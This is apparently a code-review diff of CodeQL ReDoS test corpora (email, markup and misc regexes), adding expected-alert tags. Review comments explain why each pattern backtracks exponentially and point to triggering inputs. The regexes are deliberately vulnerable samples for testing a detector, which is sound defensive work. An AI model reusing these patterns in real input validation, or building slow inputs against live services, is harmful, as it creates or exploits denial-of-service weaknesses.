/^[0-9]{4}-(((0[13578]|(10|12))-(0[1-9]|[1-2][0-9]|3[0-1]))|(02-(0[1-9]|[1-2][0-9]))|((0[469]|11)-(0[1-9]|[1-2][0-9]|30)))$/g; /^([0]?[1-9]|[1][0-2])[./-]([0]?[1-9]|[1|2][0-9]|[3][0|1])[./-]([0-9]{4}|[0-9]{2})$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js index a68c66d2fea8..f7ab34777169 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/email.js 
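Review bot: The regex tagged here is not a JavaScript regex: `(?<-C>)` and `(?(C)(?!))` are .NET balancing-group and conditional syntax, and `(?)` looks like a `(?<C>)` whose name was stripped, so a JS engine would throw a SyntaxError rather than backtrack. Whether js/redos reports it therefore depends on how CodeQL's regex parser recovers from those constructs, which deserves a remark so the line is not later cited as a real exponential finding, e.g. `// $ Alert[js/redos] - .NET-only syntax; result reflects parser recovery, not a JS-valid pattern`. I cannot tell from the hunk whether the name stripping is in the corpus file or only in this rendering.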
@@ -1,16 +1,16 @@ -/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@([0-9a-zA-Z][-\w]*[0-9a-zA-Z]\.)+[a-zA-Z]{2,9})$/g; +/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@([0-9a-zA-Z][-\w]*[0-9a-zA-Z]\.)+[a-zA-Z]{2,9})$/g; // $ Alert[js/redos] /(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})/g; /^((?>[a-zA-Z\d!#$%&'*+\-/=?^_`{|}~]+\x20*|"((?=[\x01-\x7f])[^"\\]|\\[\x01-\x7f])*"\x20*)*(?<))?((?!\.)(?>\.?[a-zA-Z\d!#$%&'*+\-/=?^_`{|}~]+)+|"((?=[\x01-\x7f])[^"\\]|\\[\x01-\x7f])*")@(((?!-)[a-zA-Z\d\-]+(?)$/g; /^\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,3}$/g; -/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; -/^((?:(?:(?:[a-zA-Z0-9][\.\-\+_]?)*)[a-zA-Z0-9])+)\@((?:(?:(?:[a-zA-Z0-9][\.\-_]?){0,62})[a-zA-Z0-9])+)\.([a-zA-Z0-9]{2,6})$/g; +/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; // $ Alert[js/redos] +/^((?:(?:(?:[a-zA-Z0-9][\.\-\+_]?)*)[a-zA-Z0-9])+)\@((?:(?:(?:[a-zA-Z0-9][\.\-_]?){0,62})[a-zA-Z0-9])+)\.([a-zA-Z0-9]{2,6})$/g; // $ Alert[js/redos] /^[_a-zA-Z0-9-]+(\.[_a-zA-Z0-9-]+)*@[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*\.(([0-9]{1,3})|([a-zA-Z]{2,3})|(aero|coop|info|museum|name))$/g; /(?(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\"(?:(?:[^\"\\\r\n])|(?:\\.))*\"))(?:\.(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\"(?:(?:[^\"\\\r\n])|(?:\\.))*\")))*)@(?(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\[(?:(?:[^\[\]\\\r\n])|(?:\\.))*\]))(?:\.(?:(?:[^ \t\(\)\<\>@,;\:\\\"\.\[\]\r\n]+)|(?:\[(?:(?:[^\[\]\\\r\n])|(?:\\.))*\])))*)/g; /^([0-9a-zA-Z]+[-._+&])*[0-9a-zA-Z]+@([-0-9a-zA-Z]+[.])+[a-zA-Z]{2,6}$/g; /^[\w-\.]+@([\w-]+\.)+[\w-]{2,4}$/g; /^(([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5}){1,25})+([;.](([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5}){1,25})+)*$/g; /\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*([,;]\s*\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*)*/g; -/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*\s+<(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})>$|^(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})$/g; +/^[a-zA-Z]+(([\'\,\.\- 
][a-zA-Z ])?[a-zA-Z]*)*\s+<(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})>$|^(\w[-._\w]*\w@\w[-._\w]*\w\.\w{2,3})$/g; // $ Alert[js/redos] /^([a-zA-Z0-9_\-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/g; /^\w+[\w-\.]*\@\w+((-\w+)|(\w*))\.[a-z]{2,3}$/g; /^[\w-]+(?:\.[\w-]+)*@(?:[\w-]+\.)+[a-zA-Z]{2,7}$/g; 
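Review bot: All the newly tagged lines in this hunk share one shape — `([-.\w]*[0-9a-zA-Z])*`, `(([_\.\-]?[a-zA-Z0-9]+)*)`, `(?:(?:[a-zA-Z0-9][\.\-\+_]?)*)[a-zA-Z0-9])+` and `(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*` — where the separator is optional and adjacent classes overlap, so a letter run can be partitioned into iterations in exponentially many ways before `@` or `$` fails; a one-line remark naming the sub-pattern next to each tag would make the expectations reviewable. The untagged `/^([0-9a-zA-Z]+[-._+&])*[0-9a-zA-Z]+@…/` is consistent with that reading because its separator `[-._+&]` is mandatory. The last tagged literal is split across two rendered lines here (`[\'\,\.\- ` / `][a-zA-Z ])`), which is a display artefact and not part of the change as far as I can tell.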
@@ -22,16 +22,16 @@ /^\W{0,5}[Rr]e:\W[a-zA-Z0-9]{1,10},\W[a-z]{1,10}\W[a-z]{1,10}\W[a-z]{1,10}/g; /^([\w\d\-\.]+)@{1}(([\w\d\-]{1,67})|([\w\d\-]+\.[\w\d\-]{1,67}))\.(([a-zA-Z\d]{2,4})(\.[a-zA-Z\d]{2})?)$/g; /^([\w\-\.]+)@((\[([0-9]{1,3}\.){3}[0-9]{1,3}\])|(([\w\-]+\.)+)([a-zA-Z]{2,4}))$/g; -/^((([a-zA-Z\'\.\-]+)?)((,\s*([a-zA-Z]+))?)|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})))(;{1}(((([a-zA-Z\'\.\-]+){1})((,\s*([a-zA-Z]+))?))|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})){1}))*$/g; +/^((([a-zA-Z\'\.\-]+)?)((,\s*([a-zA-Z]+))?)|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})))(;{1}(((([a-zA-Z\'\.\-]+){1})((,\s*([a-zA-Z]+))?))|([A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})){1}))*$/g; // $ Alert[js/redos] /^[a-z0-9][a-z0-9_\.-]{0,}[a-z0-9]@[a-z0-9][a-z0-9_\.-]{0,}[a-z0-9][\.][a-z0-9]{2,4}$/g; /(?(?![ ])(\w|[.])*@(\w|[.])*)/g; /\w+[\w-\.]*\@\w+((-\w+)|(\w*))\.[a-z]{2,3}$|^([0-9a-zA-Z'\.]{3,40})\*|([0-9a-zA-Z'\.]+)@([0-9a-zA-Z']+)\.([0-9a-zA-Z']+)$|([0-9a-zA-Z'\.]+)@([0-9a-zA-Z']+)\*+$|^$/g; /[\w-]+@([\w-]+\.)+[\w-]+/g; /^(?:[a-zA-Z0-9_'^&/+-])+(?:\.(?:[a-zA-Z0-9_'^&/+-])+)*@(?:(?:\[?(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))\.){3}(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\]?)|(?:[a-zA-Z0-9-]+\.)+(?:[a-zA-Z]){2,}\.?)$/g; /^((?[a-z]:)|(\\\\(?[0-9]*[a-z\-][a-z0-9\-]*)\\(?[^\.\x01-\x1F\\""\*\?<>:|\\/][^\x01-\x1F\\""\*\?|><:\\/]*)))?(?(?(\.|(\.\.)|([^\.\x01-\x1F\\""\*\?|><:\\/][^\x01-\x1F\\""\*\?<>:|\\/]*)))?(?[\\/](\.|(\.\.)|([^\.\x01-\x1F\\""\*\?|><:\\/][^\x01-\x1F\\""\*\?<>:|\\/]*)))*)?[\\/]?$/g; -/^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$/g; -/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$/g; -/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; 
+/^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$/g; // $ Alert[js/redos] +/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+[a-zA-Z]{2,9})$/g; // $ Alert[js/redos] +/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@([A-Za-z0-9]+)(([\.\-]?[a-zA-Z0-9]+)*)\.([A-Za-z]{2,})$/g; // $ Alert[js/redos] /^[\w-]+(\.[\w-]+)*@([a-z0-9-]+(\.[a-z0-9-]+)*?\.[a-z]{2,6}|(\d{1,3}\.){3}\d{1,3})(:\d{4})?$/g; /^[\w\.=-]+@[\w\.-]+\.[\w]{2,3}$/g; /^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js index 31edb6c76ddc..db5d45df0f74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/markup.js 
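Review bot: Two of the three newly tagged lines, `/^[A-Za-z0-9](([_\.\-]?[a-zA-Z0-9]+)*)@…/` and `/^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@…/`, are near-verbatim repeats of lines tagged in the first hunk of this file (the second differs only in the domain part, `(([0-9a-zA-Z])+([-\w]*[0-9a-zA-Z])*\.)+`, which adds a second nested-quantifier ambiguity), so any explanatory remark should be kept identical on both copies. For `/^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@…/` the exponential part is the outer `(…)+` around `(?:\w[\.\-\+]?)*\w`: the separator is optional, so a `\w` run can be cut into iterations arbitrarily, and the `{0,62}` in the domain half only bounds the inner piece, not the outer repetition. Suggest `// $ Alert[js/redos] - outer (…)+ around optional-separator run` on that line.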
@@ -1,27 +1,27 @@ /<[^>]*\n?.*=("|')?(.*\.jpg)("|')?.*\n?[^<]*>/g; /<[^>]*>/g; -/(<\/?)(?i:(?a(bbr|cronym|ddress|pplet|rea)?|b(ase(font)?|do|ig|lockquote|ody|r|utton)?|c(aption|enter|ite|(o(de|l(group)?)))|d(d|el|fn|i(r|v)|l|t)|em|f(ieldset|o(nt|rm)|rame(set)?)|h([1-6]|ead|r|tml)|i(frame|mg|n(put|s)|sindex)?|kbd|l(abel|egend|i(nk)?)|m(ap|e(nu|ta))|no(frames|script)|o(bject|l|pt(group|ion))|p(aram|re)?|q|s(amp|cript|elect|mall|pan|t(r(ike|ong)|yle)|u(b|p))|t(able|body|d|extarea|foot|h|itle|r|t)|u(l)?|var))(\s(?.+?))*>/g; +/(<\/?)(?i:(?a(bbr|cronym|ddress|pplet|rea)?|b(ase(font)?|do|ig|lockquote|ody|r|utton)?|c(aption|enter|ite|(o(de|l(group)?)))|d(d|el|fn|i(r|v)|l|t)|em|f(ieldset|o(nt|rm)|rame(set)?)|h([1-6]|ead|r|tml)|i(frame|mg|n(put|s)|sindex)?|kbd|l(abel|egend|i(nk)?)|m(ap|e(nu|ta))|no(frames|script)|o(bject|l|pt(group|ion))|p(aram|re)?|q|s(amp|cript|elect|mall|pan|t(r(ike|ong)|yle)|u(b|p))|t(able|body|d|extarea|foot|h|itle|r|t)|u(l)?|var))(\s(?.+?))*>/g; // $ Alert[js/redos] /\xA9/g; /(?'DateLiteral' (?# Per the VB Spec : DateLiteral ::= '#' [ Whitespace+ ] DateOrTime [ Whitespace+ ] '#' ) \#\s* (?'DateOrTime' (?# DateOrTime ::= DateValue Whitespace+ TimeValue | DateValue | TimeValue ) (?'DateValue' (?# DateValue ::= Whitespace+ TimeValue | DateValue | TimeValue ) ( (?# DateValue ::= MonthValue \/ DayValue \/ YearValue | MonthValue - DayValue - YearValue ) (?'Month'(0?[1-9])|1[0-2]) (?# Month 01 - 12 ) (?'Sep'[-/]) (?# Date separator '-' or '\/' ) (?'Day'0?[1-9]|[12]\d|3[01]) (?# Day 01 - 31 ) \k'Sep' (?# whatever date separator was previously matched ) (?'Year'\d{1,4}) \s+ (?# TimeValue ::= HourValue : MinuteValue [ : SecondValue ] [ WhiteSpace+ ] [ AMPM ] ) (?'HourValue'(0?[1-9])|1[0-9]|2[0-4]) (?# Hour 01 - 24 ) [:] (?'MinuteValue'0?[1-9]|[1-5]\d|60) (?# Minute 01 - 60 ) [:] (?'SecondValue':0?[1-9]|[1-5]\d|60)? (?# Optional Minute :01 - :60 ) \s* (?'AMPM'[AP]M)? 
) | ( (?# DateValue ::= MonthValue \/ DayValue \/ YearValue | MonthValue - DayValue - YearValue ) (?'Month'(0?[1-9])|1[0-2]) (?# Month 01 - 12 ) (?'Sep'[-/]) (?# Date separator '-' or '\/' ) (?'Day'0?[1-9]|[12]\d|3[01]) (?# Month 01 - 31 ) \k'Sep' (?# whatever date separator was previously matched ) (?'Year'\d{4}) ) | ( (?# TimeValue ::= HourValue : MinuteValue [ : SecondValue ] [ WhiteSpace+ ] [ AMPM ] ) (?'HourValue'(0?[1-9])|1[0-9]|2[0-4]) (?# Hour 01 - 24 ) [:] (?'MinuteValue'0?[1-9]|[1-5]\d|60) (?# Minute 01 - 60 ) [:] (?'SecondValue':0?[1-9]|[1-5]\d|60)? (?# Optional Minute :01 - :60 ) \s* (?'AMPM'[AP]M)? ) ) ) \s*\# )/g; /(SELECT\s[\w\*\)\(\,\s]+\sFROM\s[\w]+)| (UPDATE\s[\w]+\sSET\s[\w\,\'\=]+)| (INSERT\sINTO\s[\d\w]+[\s\w\d\)\(\,]*\sVALUES\s\([\d\w\'\,\)]+)| (DELETE\sFROM\s[\d\w\'\=]+)/g; -/"([^"](?:\\.|[^\\"]*)*)"/g; +/"([^"](?:\\.|[^\\"]*)*)"/g; // $ Alert[js/redos] /href=[\"\'](http:\/\/|\.\/|\/)?\w+(\.\w+)*(\/\w+(\.\w+)?)*(\/|\?\w*=\w*(&\w*=\w*)*)?[\"\']/g; //g; /(?s)( class=\w+(?=([^<]*>)))|()|()|()|([^<]*<\/o:p>)|(]*>)|(<\/span>)|(font-family:[^>]*[;'])|(font-size:[^>]*[;'])(?-s)/g; -/<(?:[^"']+?|.+?(?:"|').*?(?:"|')?.*?)*?>/g; +/<(?:[^"']+?|.+?(?:"|').*?(?:"|')?.*?)*?>/g; // $ Alert[js/redos] /<(?.*).*>(?.*)<\/\k>/g; /<(\/{0,1})img(.*?)(\/{0,1})\>/g; /src[^>]*[^/].(?:jpg|bmp|gif)(?:\"|\')/g; -/<(\w+)(\s(\w*=".*?")?)*((\/>)|((\/*?)>.*?<\/\1>))/g; +/<(\w+)(\s(\w*=".*?")?)*((\/>)|((\/*?)>.*?<\/\1>))/g; // $ Alert[js/redos] /(?i:on(blur|c(hange|lick)|dblclick|focus|keypress|(key|mouse)(down|up)|(un)?load|mouse(move|o(ut|ver))|reset|s(elect|ubmit)))/g; /([^'("|')]*)("|')){1}|content\s*=\s*("|')(?[^'("|')]*)("|')|scheme\s*=\s*("|')(?[^'("|')]*)("|'))/g; /<\*?font # Match start of Font Tag (?(?=[^>]+color.*>) #IF\/THEN lookahead color in tag (.*?color\s*?[=|:]\s*?) 
# IF found THEN move ahead ('+\#*?[\w\s]*'+ # CAPTURE ColorName\/Hex |"+\#*?[\w\s]*"+ # single or double |\#*\w*\b) # or no quotes .*?> # & move to end of tag |.*?> # ELSE move to end of Tag ) # Close the If\/Then lookahead # Use Multiline and IgnoreCase # Replace the matches from RE with MatchEvaluator below: # if m.Groups(1).Value<>"" then # Return "" # else # Return "" # end if/g; /(?'openingTag'<) \s*? (?'tagName'\w+) # Once we've got the tagname, match zero # or more attribute sequences (\s*? # Atomic Grouping for efficiency (?> (?!=[\/\?]?>) # Lookahead so that we can fail quickly # match Attribute pieces (?'attribName'\w+) (?:\s* (?'attribSign'=) \s* ) (?'attribValue' (?:\'[^\']*\'|\"[^\"]*\"|[^ >]+) ) ) )* \s*? # Closing Tag can be either > or \/> (?'closeTag'[\/\?]?>)/g; /^#?(([fFcC0369])\2){3}$/g; /&(?![a-zA-Z]{2,6};|#[0-9]{3};)/g; -/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; +/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; // $ Alert[js/redos] /<[a-zA-Z][^>]*\son\w+=(\w+|'[^']*'|"[^"]*")[^>]*>/g; />(?:(?[^<]*))/g; /<[^>]*name[\s]*=[\s]*"?[^\w_]*"?[^>]*>/g; 
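Review bot: The first tagged regex, `/(<\/?)(?i:(?a(bbr|…)…)(\s(?.+?))*>/g`, contains `(?a(` and `(?.+?)`, which look like named groups with the `<name>` stripped, and `(?i:…)` is an inline-flag group JavaScript does not support; as written it is not a valid JS literal, so its js/redos alert reflects parser recovery rather than a pattern a JS engine would run, and a remark saying so would keep it from being cited as a real finding. The other tags look genuine: `/"([^"](?:\\.|[^\\"]*)*)"/g` nests `[^\\"]*`, which can match the empty string, inside `(…)*`, and in `/<(\w+)(\s(\w*=".*?")?)*(…)/g` the `.*?` inside the quotes can swallow ` y="…"` so a tag with n attributes appears to admit about 2^n parses. Suggest `// $ Alert[js/redos] - (?:\\.|[^\\"]*)*: inner alternative can match empty` on the quoted-string line as the example to copy.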
@@ -34,26 +34,26 @@ /<([^\s>]*)(\s[^<]*)>/g; /^[a-zA-Z_]{1}[a-zA-Z0-9_]+$/g; /[0][x][0-9a-fA-F]+/g; -/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; +/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; // $ Alert[js/redos] /%[\-\+0\s\#]{0,1}(\d+){0,1}(\.\d+){0,1}[hlI]{0,1}[cCdiouxXeEfgGnpsS]{1}/g; /^(Function|Sub)(\s+[\w]+)\([^\(\)]*\)/g; -/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; +/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; // $ Alert[js/redos] /^(?([^"']|"[^"]*")*)'(?.*)$/g; />(?:(?[^<]*))/g; /<[a-zA-Z][^>]*\son\w+=(\w+|'[^']*'|"[^"]*")[^>]*>/g; /<[^>]*name[\s]*=[\s]*"?[^\w_]*"?[^>]*>/g; /\/\*[\d\D]*?\*\//g; /^#?([a-f]|[A-F]|[0-9]){3}(([a-f]|[A-F]|[0-9]){3})?$/g; -/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; +/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})(\s+(\S+)(\s*=\s*([-\w\.]{1,1024}|"[^"]{0,1024}"|'[^']{0,1024}'))?)*\s*>/g; // $ Alert[js/redos] //g; /("[^"]*")|('[^\r]*)(\r\n)?/g; /(?'openingTag'<) \s*? (?'tagName'\w+) # Once we've got the tagname, match zero # or more attribute sequences (\s*? # Atomic Grouping for efficiency (?> (?!=[\/\?]?>) # Lookahead so that we can fail quickly # match Attribute pieces (?'attribName'\w+) (?:\s* (?'attribSign'=) \s* ) (?'attribValue' (?:\'[^\']*\'|\"[^\"]*\"|[^ >]+) ) ) )* \s*? 
# Closing Tag can be either > or \/> (?'closeTag'[\/\?]?>)/g; /&(?![a-zA-Z]{2,6};|#[0-9]{3};)/g; /^#?(([fFcC0369])\2){3}$/g; -/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; +/(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])([a-zA-Z0-9|:|\/|=|-|.|\?|&|\s]+)(\[\/\2\])/g; // $ Alert[js/redos] /[0][x][0-9a-fA-F]+/g; /%[\-\+0\s\#]{0,1}(\d+){0,1}(\.\d+){0,1}[hlI]{0,1}[cCdiouxXeEfgGnpsS]{1}/g; -/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; +/^(?(\/?(?\w+))+)(?\[(?\s*(?@\w+)\s*(?<=|>=|<>|=|<|>)\s*(?('[^']*'|"[^"]*"))\s*(and|or)?)+\])*$/g; // $ Alert[js/redos] /^(Function|Sub)(\s+[\w]+)\([^\(\)]*\)/g; /^[a-zA-Z_]{1}[a-zA-Z0-9_]+$/g; /^[^<>`~!/@\#}$%:;)(_^{&*=|'+]+$/g; diff --git a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js index db1e10df7386..550fff9a1225 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/regexplib/misc.js @@ -1,7 +1,7 @@ /^\d{3}\s?\d{3}$/g; /^([a-zA-Z0-9@*#]{8,15})$/g; /^(?=.*\d).{4,8}$/g; -/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*$/g; +/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*$/g; // $ Alert[js/redos] /((\(\d{3}\) ?)|(\d{3}-))?\d{3}-\d{4}/g; /^\D?(\d{3})\D?\D?(\d{3})\D?(\d{4})$/g; /^(?=.*\d)(?=.*[a-z])(?=.*[A-Z])(?!.*\s).{4,8}$/g; 
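Review bot: Each tagged regex in this hunk appears twice, and `/<\/?([a-zA-Z][-A-Za-z\d\.]{0,71})…/` is tagged in the first hunk as well, so the corpus is duplicated and any remark written for one copy should be pasted onto the others to keep them from drifting. In `(\[(\w+)\s*(([\w]*)=('|")?([a-zA-Z0-9|:|\/|=|-|.|\?|&]*)(\5)?)*\])` the value class contains `=`, so `a=b=c=d` can be consumed as one attribute or several — that is the ambiguity behind the alert, and is worth stating inline. `/^(?(\/?(?\w+))+)(?\[…/` has its group names stripped (`(?(`, `(?\w+)`) and is not a valid JS literal, so that alert depends on parser recovery and should be marked as such.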
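Review bot: `/^[a-zA-Z]+(([\'\,\.\- ][a-zA-Z ])?[a-zA-Z]*)*$/g` is the name half of a regex tagged in email.js, and the reason is the same: the group body `(…)?[a-zA-Z]*` can match the empty string and its `[a-zA-Z]*` overlaps the leading `[a-zA-Z]+`, so `Aaaa…!` has exponentially many parses before `$` fails. A remark such as `// $ Alert[js/redos] - (…)?[a-zA-Z]* can match empty inside (…)*` next to the tag would document that; this file carries no such remarks yet, so it would also set the style for the rest of it.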
@@ -12,7 +12,7 @@ /[:]{1}[-~+o]?[)>]+/g; /^\d{5}(-\d{4})?$/g; /^([a-z0-9]{32})$/g; -/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; +/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; // $ Alert[js/redos] /\u00A3/g; /\u2122/g; /^[{|\(]?[0-9a-fA-F]{8}[-]?([0-9a-fA-F]{4}[-]?){3}[0-9a-fA-F]{12}[\)|}]?$/g; @@ -21,7 +21,7 @@ /^(([\w][\w\-\.]*)\.)?([\w][\w\-]+)(\.([\w][\w\.]*))?$/g; /^(eth[0-9]$)|(^eth[0-9]:[1-9]$)/g; /^((Fred|Wilma)\s+Flintstone|(Barney|Betty)\s+Rubble)$/g; -/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; +/^(([a-zA-Z]:|\\)\\)?(((\.)|(\.\.)|([^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?))\\)*[^\\/:\*\?"\|<>\. ](([^\\/:\*\?"\|<>\. ])|([^\\/:\*\?"\|<>]*[^\\/:\*\?"\|<>\. ]))?$/g; // $ Alert[js/redos] /\u00A3/g; /^([a-z0-9]{32})$/g; /[:]{1}[-~+o]?[)>]+/g; @@ -76,7 +76,7 @@ /(AUX|PRN|NUL|COM\d|LPT\d)+\s*$/g; /^[a-zA-Z]{1,2}[0-9][0-9A-Za-z]{0,1} {0,1}[0-9][A-Za-z]{2}$/g; /\d{4}-?\d{4}-?\d{4}-?\d{4}/g; -/^(\/w|\/W|[^<>+?$%{}&])+$/g; +/^(\/w|\/W|[^<>+?$%{}&])+$/g; // $ Alert[js/redos] /([0-1][0-9]|2[0-3]):[0-5][0-9]/g; /([A-Zäöü0-9\/][^a-z\:\,\(\)]*[A-Zäöü0-9])($|[\.\:\,\;\)\-\ \+]|s\b)/g; /^[\u0081-\uFFFF]{1,}$/g; 
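Review bot: In `/^(\/w|\/W|[^<>+?$%{}&])+$/g` the author evidently meant `\w|\W` and typed `\/w`, a literal `/w`; because `[^<>+?$%{}&]` also matches `/` and `w`, the sequence `/w` can be consumed by the first alternative or by two passes of the third, which is the ambiguity js/redos reports. That is worth noting alongside the tag (`// $ Alert[js/redos] - '\/w' overlaps the negated class`), since the intended pattern would not have had this overlap. The same literal is tagged again later in this file, so put the remark on both copies.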
